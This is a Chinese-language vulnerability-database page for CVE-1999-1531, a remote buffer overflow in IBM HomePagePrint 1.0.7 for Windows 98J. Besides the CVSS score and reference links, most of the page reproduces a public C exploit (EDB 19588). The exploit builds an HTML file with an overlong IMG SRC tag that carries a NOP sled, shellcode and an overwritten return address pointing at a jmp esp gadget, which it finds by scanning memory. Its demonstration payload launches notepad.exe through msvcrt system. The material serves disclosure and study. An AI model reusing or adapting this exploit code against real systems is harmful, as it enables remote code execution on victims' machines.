CVE-1999-1531
CVSS7.5
发布时间 :1999-11-02 00:00:00
修订时间 :2016-10-17 22:05:33
NMCOE    

[原文]Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag.


[CNNVD]Windows98J IBM HomePagePrint 缓冲区溢出漏洞(CNNVD-199911-012)

        Windows98J的IBM HomePagePrint 1.0.7版本存在缓冲区溢出漏洞。恶意网站借助长的IMG_SRC HTML标签在浏览器系统中执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1531
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1531
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-012
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=94157187815629&w=2
(UNKNOWN)  BUGTRAQ  19991102 Some holes for Win/UNIX softwares
http://www.iss.net/security_center/static/7767.php
(UNKNOWN)  XF  ibm-homepageprint-bo(7767)
http://www.securityfocus.com/bid/763
(VENDOR_ADVISORY)  BID  763

- 漏洞信息

Windows98J IBM HomePagePrint 缓冲区溢出漏洞
高危 缓冲区溢出
1999-11-02 00:00:00 2005-05-02 00:00:00
远程  
        Windows98J的IBM HomePagePrint 1.0.7版本存在缓冲区溢出漏洞。恶意网站借助长的IMG_SRC HTML标签在浏览器系统中执行任意代码。

- 公告与补丁

        

- 漏洞信息 (19588)

IBM HomePagePrint 1.0 7 Buffer Overflow Vulnerability (EDBID:19588)
windows remote
1999-11-02 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/763/info

Certain versions of the IBM Web page printout software "IBM HomePagePrint " can in some instances be remotely exploited by malicious webservers. The problem lies in a buffer overflow in the code which handles IMG_SRC tags. If a page containing a specially constructed IMG SRC tag is previewed or printed using the IBM HomePagePrint software, arbitrary code can be run on the client.

/*=============================================================================
   IBM HomePagePrint Version 1.0.7 Exploit for Windows98
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include	<stdio.h>
#include	<windows.h>

#define		EXPLOIT_HTML	"exploit.html"
#define		HOST_ADDR		"http://www.geocities.co.jp/SiliconValley-SanJose/7479/"
#define		EIP				990
#define		JMPS_CODE		0xe9
#define		JMPS_OFS		0xfffff790

unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";

unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
	unsigned int	adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
			adr=(unsigned int)p;
			if ((adr&0xff)==0) continue;
			if (((adr>>8)&0xff)==0) continue;
			if (((adr>>16)&0xff)==0) continue;
			if (((adr>>24)&0xff)==0) continue;
			return(adr);
		}
	return(0);
}

int PASCAL WinMain(HINSTANCE hInst, HINSTANCE hInstPrev, LPSTR pszCmdLine, int CmdShow)
{
	FILE					*fp;
	unsigned int			i,ip,eip;
	static unsigned char	buf[30000];

	if ((fp=fopen(EXPLOIT_HTML,"wb"))==NULL) return FALSE;
	fprintf(fp,"<HTML><IMG SRC=\"");

	memset(buf,'a',2000); buf[2000]=0;
	for (i=0;i<50;i++) buf[i]=0x90;
	strcat(exploit_code,cmdbuf);
	memcpy(buf+50,exploit_code,strlen(exploit_code));

    for (i=0;;i+=2){
		if (mems[i]==0) return FALSE;
		if ((ip=search_mem(fp,(unsigned char *)mems[i],
			(unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
    }

	eip=EIP-strlen(HOST_ADDR);
	buf[eip  ]=ip&0xff;
	buf[eip+1]=(ip>>8)&0xff;
	buf[eip+2]=(ip>>16)&0xff;
	buf[eip+3]=(ip>>24)&0xff;

	ip=JMPS_OFS;
	buf[eip+4]=JMPS_CODE;
	buf[eip+5]=ip&0xff;
	buf[eip+6]=(ip>>8)&0xff;
	buf[eip+7]=(ip>>16)&0xff;
	buf[eip+8]=(ip>>24)&0xff;

	fwrite(buf,2000,1,fp);

	fprintf(fp,"\"></HTML>");
	fclose(fp);
	return FALSE;
}

		

- 漏洞信息

1132
IBM HomePagePrint IMG_SRC Tag Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-11-02 Unknow
1999-11-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站